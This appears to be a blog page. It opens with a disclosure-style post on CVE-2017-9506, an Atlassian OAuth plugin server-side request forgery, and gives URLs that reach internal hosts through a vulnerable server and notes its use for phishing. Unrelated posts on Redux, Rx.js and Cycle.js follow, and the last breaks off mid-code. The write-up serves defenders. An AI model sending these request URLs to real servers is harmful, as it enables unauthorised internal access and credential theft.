<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 24pt;">There is a proxy in your Atlassian Product! (CVE-2017-9506)</h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You might not know it but the Atlassian OAuth plugin is part of most Atlassian products such as Jira and Confluence. Until recently it had a vulnerability that allowed the unauthenticated execution of HTTP GET requests from the server. You can do all kinds of interesting things with it, like accessing resources on the internal network or spoofing pages with a valid TLS connection. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this blog post I will describe the vulnerability, explain how it works, how to test for it and why it is a bad thing TM.</span></span></div>
<a name='more'></a><span style="font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 18pt;">
<span style="font-size: large;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">The vulnerability</span></span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As part of my research for <a href="https://www.atlasscan.com/" target="_blank">Atlasscan</a> I sometimes browse the Atlassian JIRA in search for security related issues and see if I can test for them. Last weekend I stumbled upon </span><a href="https://ecosystem.atlassian.net/browse/OAUTH-344" target="_blank">OAuth-344</a>, which is the vulnerability we're talking about. It sounded interesting so I decided to have a look.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is nice that the Atlassian OAuth plugin is open source, so you can</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><a href="https://bitbucket.org/atlassian/atlassian-oauth/commits/cacd1a118fdc3dc7562d48110340b3de4f0b0af9" target="_blank">examine the commits that fixed the issue</a>. There was an <span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;">IconUriServle</span>t</span> that accepted a GET request and took the value from the <span style="font-family: "courier new" , "courier" , monospace;">consumerUri</span> parameter and used it to create another HTTP GET request, this time executed from the server. The response from the request was then streamed back across the original request. That is proxy functionality alright!</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZVso9LLJCmrywF-hLBPNUxSjepLKtJPWST0_oENcAXwB9vn2UZY4hPLYg_8PT1kCT344Ek2IZG6L1Df62v6CoHVcJ67KuqDHE7ZwImi5KKkO_2bLqeT6CIdo2hEH9Jj0zrQT2YLNiwVfu/s1600/OAuth-344.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="437" data-original-width="890" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZVso9LLJCmrywF-hLBPNUxSjepLKtJPWST0_oENcAXwB9vn2UZY4hPLYg_8PT1kCT344Ek2IZG6L1Df62v6CoHVcJ67KuqDHE7ZwImi5KKkO_2bLqeT6CIdo2hEH9Jj0zrQT2YLNiwVfu/s640/OAuth-344.png" width="640" /></a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Knowing that the functionality exists is one thing, but you also need to know which URL to call. A part can be derived from the source code, the other part from the </span><a href="https://developer.atlassian.com/jiradev/jira-apis/about-the-jira-rest-apis/jira-rest-api-tutorials/jira-rest-api-example-oauth-authentication#JIRARESTAPIExample-OAuthauthentication-Step2:Configuringtheclient" target="_blank">documentation</a>.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfjI9sz9P5jVZTIh03avA3c-NfTa8UdiEPuxAIsJEHOXuY9vicpRDBwdfkm0wvEXXu24I7RdmF1zAF7Y-laXh8GUdx3VdK14bq3zTQnPNqfYaQfpmjNmVGno34BxlDRoYLVpTooNbNguv/s1600/OAuth-344-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="64" data-original-width="1159" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfjI9sz9P5jVZTIh03avA3c-NfTa8UdiEPuxAIsJEHOXuY9vicpRDBwdfkm0wvEXXu24I7RdmF1zAF7Y-laXh8GUdx3VdK14bq3zTQnPNqfYaQfpmjNmVGno34BxlDRoYLVpTooNbNguv/s640/OAuth-344-2.png" width="640" /></a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 18pt;">
<span style="font-size: large;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">How to Test for the vulnerability</span></span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">So in order to test if the vulnerability is present you need to form an URL like so:</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">https://%basepath%/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl</span></span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you execute this request in a browser (and replace <span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;">%basepath%</span></span> with your Atlassian product base path :-) and are greeted with a Google page you now know which URL to block :-) If however you get a 404 all is well because the servlet no longer exists in newer versions of the plugin.</span></span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 18pt;">
<span style="font-size: large;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Why is this a bad thing TM?</span></span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Well first of all, because the server executes an HTTP request with an URL of your choice and returns the results, you can access any resource the server has access to.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Often the server resides on an internal network and if you know or guess the name of any http resources on that network you can access them. For example a vulnerable Jira server is accessible from the internet, but an internal Confluence is only available on the internal network. You could access it with an URL like this: </span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">https://jira.company.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://confluence.company.com/</span></span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Secondly you can use this feature to phish for credentials by accessing a spoofed login page through this URL. The TLS lock is green, domain name checks out, but you may be looking at code from a whole different domain. Also you can use this to serve untrustworthy content using a trusted domain (think ads and worse).</span></span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 18pt;">
<span style="font-size: large;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></span></span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I think this vulnerability has not received the attention it deserves. The administrators I have talked to so far were unaware of it. This kind of makes sense because it never featured on the <a href="https://www.atlassian.com/trust/security" target="_blank">Atlassian security</a> page and <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9506" target="_blank">CVE-2017-9506</a> listed only the OAuth component, not the products.</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">So, if you find your Atlassian product vulnerable please inform your administrator and ask him to block the URL or upgrade to a later version of your product.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">According to the Atlassian Jira the following versions are vulnerable:</span></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bamboo < 6.0.0</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Confluence < 6.1.3</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Jira < 7.3.5</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bitbucket < 4.14.4</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Crowd < 2.11.2</span></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Crucible & Fisheye < 4.3.2</span></span></div>
</li>
</ul>
<h1>Post-MVC part 8: Conclusions</h1>
<h2>
Intro</h2>
In this series we've learned about the benefits of a Component based architecture and we have seen how it differs from the traditional MVC architecture.<br />
<br />
A Component based architecture is a Tree of Components in which each Component takes care of a part of the UI of an application. We saw that managing state for a Tree of Components can be difficult because the state lives in various locations.<br />
<br />
We also saw that communication between Components can be difficult because a Component can only talk to its children or its parent. Components that need to talk to their siblings or cousins require channels to be opened through their parents.<br />
<br />
We learned about unidirectional data flows and about observables, two ways to reduce the complexity of a Component based architecture.<br />
<br />
This week I want to share my personal opinions on and experiences with Components, Redux, Cycle.js, Observables, and so on.
<a name='more'></a><br />
<h2>
MVC vs Components</h2>
Personally I prefer Components. I've been exploring Component-based architectures for quite some time now and I've come to the conclusion that they fit better when building UIs.<br />
<br />
<h3>
Coupling</h3>
<br />
Whenever I used MVC I always had a feeling that things did not quite fit. The main reason for this is that there was supposed to be a loose coupling between the controller and the view. In reality, however, they were very tightly coupled.<br />
<br />
Whenever the controller changed, the view had to be updated as well. When you refactored the name of an 'event', the view had to be updated to use the new name. If the view changed significantly, it almost always meant that the data structure in the controller had to change as well to make things easier for the view.<br />
<br />
Of course the same holds for a Component: whenever the JavaScript changes, the template must be updated as well, whether that template is JSX, Handlebars or Angular's template syntax. The difference is that the Component architecture accepts this; it doesn't claim that there should be low coupling between them.<br />
<br />
So saying that the Controller and View were loosely coupled in MVC was simply disingenuous. With Components I feel that this charade has finally come to an end.<br />
<br />
A Component marries the 'controller' and 'view' very tightly together into one single concept. Finally the way I wrote the code was reflected in the architecture that I used.<br />
<br />
<h3>
Conceptually easier</h3>
<br />
With MVC I always feel that I'm building something simple out of complex pieces. With Components I feel that I'm building something complex made out of simple pieces.<br />
<br />
For example, in MVC I would often write code for relatively simple screens, such as a list where you can traverse through some model via pagination, with edit, delete and view functionality. The idea is relatively simple, but the code quickly became complex. The controller would get bloated and the views would get huge.<br />
<br />
When another view was introduced which was also a list, the code would often end up duplicated. The correct thing to do is to make the list a Component, but you were not always guided toward this solution. Maybe I could write some 'mixins' for my controller, or write a partial for my views. That reduces the total lines of code, but it is a very poor layer of abstraction.<br />
<br />
When you go full Component it is clear that the solution is a generic list Component. The code used to build the application-specific UI consists of Components, and the code for reusable widgets consists of Components as well. This means that you have one abstraction for both use cases, which in my opinion makes Components conceptually easier to understand.<br />
<br />
<h3>
Easier to re-use</h3>
<br />
Since Components are isolated and have very explicit communication semantics, they are ideally suited for reuse. Of course in traditional MVC this was also the case for the widgets that we reused, which were sort of proto-Components.<br />
<br />
The difference was that when you decided a widget should be reusable, you had to extract parts out of the View. With Components you are already building isolated widgets.<br />
<br />
<h3>
Is it really that different?</h3>
<br />
In some ways a Component architecture is just a special variant of the MVC architecture. I'd like to view Components as a group of very tiny MVC applications which work together to tackle a bigger<br />
problem.<br />
<br />
This means that we do not have to learn everything all over again. We only need to get into the Component mindset.<br />
<h2>
Managing State and Events</h2>
So if you take the plunge and go for a Component-based architecture you will soon run into its limitations: the state will be stored in many different Components, and Components will start developing multiple lines of communication with each other.<br />
<br />
We've seen that Redux (unidirectional data flow) and Reactive Programming can reduce these problems. So which one do you pick?<br />
<br />
<h3>
Rx.js vs Redux </h3>
<br />
Redux is strong at managing the state of your entire application. It is an architecture for how to deal with state. It makes sure that your application's state is not scattered throughout the Components. It allows communication between Components through manipulation of commonly shared state.<br />
<br />
Rx.js is used for asynchronous programming; it makes it easier to deal with events. What is also beautiful is that the Components are reactive: they define from within which events they respond to, instead of being manipulated via some external call. It allows communication because one Component can generate events to which another Component can listen, without them knowing each other explicitly.<br />
<br />
Rx.js and Redux do not exclude each other; you can use them at the same time if you want to. So it is not actually a fight.<br />
<br />
<h3>
What about Cycle.js</h3>
<br />
Cycle.js is a really cool project which shows how great an application built with Observables can be. A downside is that the project doesn't have the developer tools that Redux provides.<br />
<br />
I also find that it is very difficult to jump into the &quot;everything is a stream&quot; mentality. Getting new developers on board is, in my opinion, more difficult.<br />
<br />
Cycle.js is also a much smaller project than, let's say, React, Ember or Angular. This means Cycle.js doesn't have the big community that the others have, so it is harder to find help.<br />
<br />
But who knows, things may be different in a couple of years.<br />
<h2>
Recommendations</h2>
So what do I recommend?<br />
<br />
Personally I recommend using Redux first and Rx.js later. By using Redux you get a pretty solid way to deal with state. This, combined with the developer tools that are available for Redux, provides a great developer experience. Redux is also relatively easy to explain; developers new to Redux should become productive quickly.<br />
<br />
When Components start relying heavily on asynchronous events, Rx.js might be a good fit for some Components, such as an autocomplete search box. At the end of a stream you can then dispatch back to the Redux store to update the state.<br />
<br />
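As a rough sketch of what I mean (assuming the RxJS 4 API used elsewhere in this series, plus a Redux store, a searchInput element and a promise-returning search function, all made up for the example), the end of such a stream simply dispatches an action:<br />
<pre><code class="javascript">
// Sketch: an autocomplete stream whose end result is dispatched to a Redux store.
// 'store', 'searchInput' and 'search' are assumed to exist in your application.
const results$ = Rx.Observable.fromEvent(searchInput, 'keyup')
  .map(event => event.target.value)
  .filter(query => query.length > 3)
  .debounce(500)
  .distinctUntilChanged()
  .flatMapLatest(search);

results$.subscribe(results => {
  // The stream handles the asynchronous part; Redux stores the resulting state.
  store.dispatch({ type: 'SEARCH_RESULTS_RECEIVED', results: results });
});
</code>
</pre>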
In theory you could use Rx.js to create your own Redux-like implementation. An Angular 2.0 library called <a href="https://github.com/ngrx/store">ngrx/store</a> does just this. It proves that Rx.js can be used to implement Redux-like stores. Since 42 B.V. is an Angular shop, I'm going to investigate this approach.<br />
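To give an idea of how little is needed, here is a minimal sketch of a Redux-like store built on an Rx.js Subject and the 'scan' operator. It follows the RxJS 4 API used elsewhere in this series and is just an illustration of the idea, not how ngrx/store is actually implemented:<br />
<pre><code class="javascript">
// Sketch: a tiny Redux-like store implemented with Rx.js.
// Actions are pushed onto a Subject; 'scan' folds each action into the next state.
function counterReducer(state, action) {
  switch (action.type) {
    case 'INCREMENT': return state + 1;
    case 'DECREMENT': return state - 1;
    default: return state;
  }
}

const action$ = new Rx.Subject();

// Start with the initial state, then reduce every dispatched action onto it.
const state$ = action$
  .startWith(0)
  .scan((state, action) => counterReducer(state, action));

state$.subscribe(state => console.log('current state:', state));

// 'Dispatching' is simply pushing an action onto the stream.
action$.onNext({ type: 'INCREMENT' }); // current state: 1
action$.onNext({ type: 'INCREMENT' }); // current state: 2
action$.onNext({ type: 'DECREMENT' }); // current state: 1
</code>
</pre>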
<div>
<br /></div>
<h1>Post-MVC part 7: Cycle.js</h1>
<h2>
Intro</h2>
<a href="http://dontpanic.42.nl/2016/07/reactive-programming.html">Last week</a> we took a look at Reactive Programming and Observables. We saw the power that the Observables bring to the table, a very strong separation of concerns between components.<br />
<br />
This week I want to take a look at <a href="http://cycle.js.org/">Cycle.js</a>, a library that lets you create Components which take observables as input and return observables as output.
<br />
<a name='more'></a><br />
<h2>
Cycle.js</h2>
The name Cycle.js comes from the way a Cycle.js application is structured. The philosophy behind Cycle.js is that both the computer and the user behind the computer are constantly observing and reacting to each other in a perpetual cycle.<br />
<br />
The computer displays some data to the user. The user sees this data and moves his mouse in order to manipulate the data. The computer responds to this event by changing the data on the screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-SXypr7257ew/V5mwZXajD8I/AAAAAAAAAFc/bjhjSMCG4fAEjA3PfXpSlBzqn53j4CiZACLcB/s1600/HCI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="https://2.bp.blogspot.com/-SXypr7257ew/V5mwZXajD8I/AAAAAAAAAFc/bjhjSMCG4fAEjA3PfXpSlBzqn53j4CiZACLcB/s320/HCI.png" width="320" /></a></div>
<br />
<br />
Let's dive into some concepts behind Cycle.js.<br />
<h2>
Everything is a stream.</h2>
Cycle.js is observables all the way from top to bottom. Everything is a stream that can be observed. This includes HTTP requests, LocalStorage reads and writes, DOM events, and so on. Even Components in Cycle.js take streams as input and produce streams as output.<br />
<h2>
Sources & Sinks</h2>
In Cycle.js a Component takes in a collection of 'sources' and produces a 'sink'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-FSnDdDix2po/V5mw2dhq2hI/AAAAAAAAAFg/y8MpgVIVBus7t0uo9IhixrAg2KtV9fyMACLcB/s1600/sinks%2Band%2Bsources.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="https://3.bp.blogspot.com/-FSnDdDix2po/V5mw2dhq2hI/AAAAAAAAAFg/y8MpgVIVBus7t0uo9IhixrAg2KtV9fyMACLcB/s320/sinks%2Band%2Bsources.png" width="320" /></a></div>
<br />
<br />
The 'sources' are all the observables that the Component needs to listen to in order to do its job. For example the Component might need to listen to DOM events so it takes the DOM observable out of the 'sources'.<br />
<br />
The 'sink' (think kitchen sink) is the end drain point of a Component. It is the collection of observables that the Component itself produces: for example a stream of HTML which represents the Component, or a stream of values for when the Component acts as an input mechanism for an HTML form.<br />
<h2>
A Counter Component</h2>
Let's create the Counter Component from the post about Redux, this time in Cycle.js. Remember that the Component is very simple: it has two buttons, one to increment the count and one to decrement it.<br />
<br />
Here is the code:<br />
<pre> <code class="javascript">
// The Counter component
function Counter(sources) {
// INTENT: Listen to increment and decrement clicks.
const increment$ = sources.DOM.select('.increment')
.events('click').map(() => +1);
const decrement$ = sources.DOM.select('.decrement')
.events('click').map(() => -1);
/*
MODEL: The count$ stream represents the current count of the counter.
The state is kept by merging the increment$ and decrement$ streams,
and then 'scanning' them on the current count.
Let's say the user clicks decrement, then increment, and then
decrement again. The marble graph of the streams lets us
visually see what is happening:
decrement$: === -1 ======= -1 ===
increment$: ========= +1 ========
---------------------------------
merged: ==== -1 == +1 = -1 ===
---------------------------------
scan: ==== -1 == 0 = -1 ===
The 'scan' operator takes the current count, which starts at
0 thanks to 'startWith', and each time a new 'merged' value
is available it runs the function. In this case the function simply
takes the current count and adds the modifier on top of it. The
value that is returned from 'scan' is the next count.
In ascii form:
=============================
| count | modifier | result |
=============================
| 0 | -1 | -1 |
-----------------------------
| -1 | +1 | 0 |
-----------------------------
| 0 | -1 | -1 |
=============================
*/
const count$ = Rx.Observable
.merge(increment$, decrement$) // Merge clicks from the buttons into one stream
.startWith(0) // Start the count at zero.
.scan((count, mod) => count + mod); // Take the current count either -1 or +1 it.
/*
VIEW: Create a stream which represents the UI of the counter.
Each time the count$ produces a new value the UI should be
re-created.
vtree$ stands for 'virtual DOM tree' a Virtual DOM is a structure
representing a DOM structure but is not the actual DOM. Cycle.js
uses a Virtual DOM to check what the difference is with the actual
real DOM. When things differ only the differences are patched back
to the actual DOM minimizing the DOM operations needed.
A video about what a Virtual DOM is: https://www.youtube.com/watch?v=a21b-KDHG-Q
*/
const vtree$ = count$.map(counter =>
CycleDOM.div([
CycleDOM.h1("Counter"),
CycleDOM.button('.decrement', '-'),
CycleDOM.span(String(counter)),
CycleDOM.button('.increment', '+')
]));
const sinks = {
DOM: vtree$
};
return sinks;
};
/*
Here Cycle.js will actually make sure our Counter app
is run. Cycle.run takes the Counter function and executes it,
so it can take the 'sinks', which it passes
to the CycleDOM driver. A driver takes a 'sink' and performs
an operation with side effects. The DOM driver takes a
stream of virtual DOM trees (vtree$) and renders them into an actual
DOM element, in this case the #content <div>.
*/
Cycle.run(Counter, {
DOM: CycleDOM.makeDOMDriver('#content')
});
</code>
</pre>
A live example can be found here: <a href="http://codepen.io/anon/pen/oxaPpP?editors=0010">http://codepen.io/anon/pen/oxaPpP?editors=0010</a><br />
<br />
From reading the comments in the snippet above you can get a pretty good feel for what the Component does. It takes the DOM stream and listens to clicks on the buttons, then uses those click events to modify the 'count'. When the count changes, the HTML is re-rendered.<br />
<br />
There is a pattern to the way the Components are defined. First we state all the 'Intents' the Component responds to, that is, all actions from the outside world that can influence it; in this case the clicks on the decrement and increment buttons.<br />
<br />
Then we take the Intents and transform them into a Model. The Model represents the state of the Component.<br />
<br />
The View then listens to the Model and whenever the Model updates the View is re-rendered.<br />
<br />
This pattern is called Model-View-Intent. It is used in every Component in Cycle.js.<br />
<br />
Also notice that the HTML produced by the Component later ends up back as a 'source' for the same Component. This is why Components in Cycle.js are in a perpetual cycle, and it is where the name Cycle.js comes from.<br />
<h2>
Communication between Components</h2>
The Counter Component example only showed a single Counter but no inter Component communication. Let's look at a more complex example: an application which has multiple counters, and has a total count for all counters combined.<br />
<pre><code class="javascript">
// The Counter component
function Counter(sources) {
// Listen to increment and decrement clicks.
const increment$ = sources.DOM.select('.increment')
.events('click').map(() => +1);
const decrement$ = sources.DOM.select('.decrement')
.events('click').map(() => -1);
const count$ = Rx.Observable.merge(increment$, decrement$)
.startWith(0)
// Track 'count' even when re-created when 'Create Counter' is clicked.
.shareReplay()
// Take the current count and perform either -1 or + 1 on it.
.scan((count, modifier) => count + modifier);
const vtree$ = count$.map(counter =>
CycleDOM.div([
CycleDOM.button('.decrement', '-'),
CycleDOM.span(String(counter)),
CycleDOM.button('.increment', '+')
]));
// Expose the count$ so external Components can observe it.
const sinks = {
DOM: vtree$,
count$: count$
};
return sinks;
}
function CounterList(sources) {
// INTENT
// Whenever 'Create Counter' button is clicked add a new IsolatedCounter.
const addCounter$ = sources.DOM.select('.create-counter')
.events('click')
.map(() => IsolatedCounter(sources));
// Whenever the user clicks on the 'remove' button remove the counter.
const removeCounter$ = sources.DOM.select('.remove')
.events('click')
.map((event) => event.target.index);
// MODEL
/*
Creates the counters$ observable by merging two other streams:
the addCounter$ and removeCounter$. Whenever one of the two fires
an event it will manipulate the list of counters.
The list initially starts off as an empty array via the 'startWith'
operator.
When either addCounter$ or removeCounter$ fires, their respective
reducer functions are put on the stream. This causes 'scan' to
trigger, applying either the addCounter or removeCounter function
to the current list. The result will be the next value of
counters$.
*/
const counters$ = Rx.Observable.merge(
addCounter$.map(counter => addCounter(counter)),
// Add a new removeCounter reducer function on the stream.
removeCounter$.map(index => removeCounter(index))
)
.startWith([])
.scan((counters, operation) => operation(counters))
.share(); // share so the totalCount$ and vtree$ each get their own fork.
/*
Calculates the totalCount and makes it available as totalCount$.
The counters$ produces an array of Counter components. The counter
objects have a count$ property; we want each of those counts so we
can add them together.
It does this by combining each Counter component's count$ into
another stream which produces an array via 'combineLatest'.
The array combineLatest produces is then summed up via a 'reduce'.
The reason we use 'flatMapLatest' on counters$ is that
'combineLatest' also produces an observable. We do not want
that observable itself, we want whatever it is producing!
The 'flatMap' takes the observable that 'combineLatest' produces,
observes it, and whenever combineLatest produces something, 'flatMap'
simply produces it too. See this video which explains it on egghead:
https://egghead.io/lessons/rxjs-rxjs-map-vs-flatmap
*/
const totalCount$ = counters$.flatMapLatest(counters => {
return Rx.Observable.combineLatest(counters.map(counter => counter.count$))
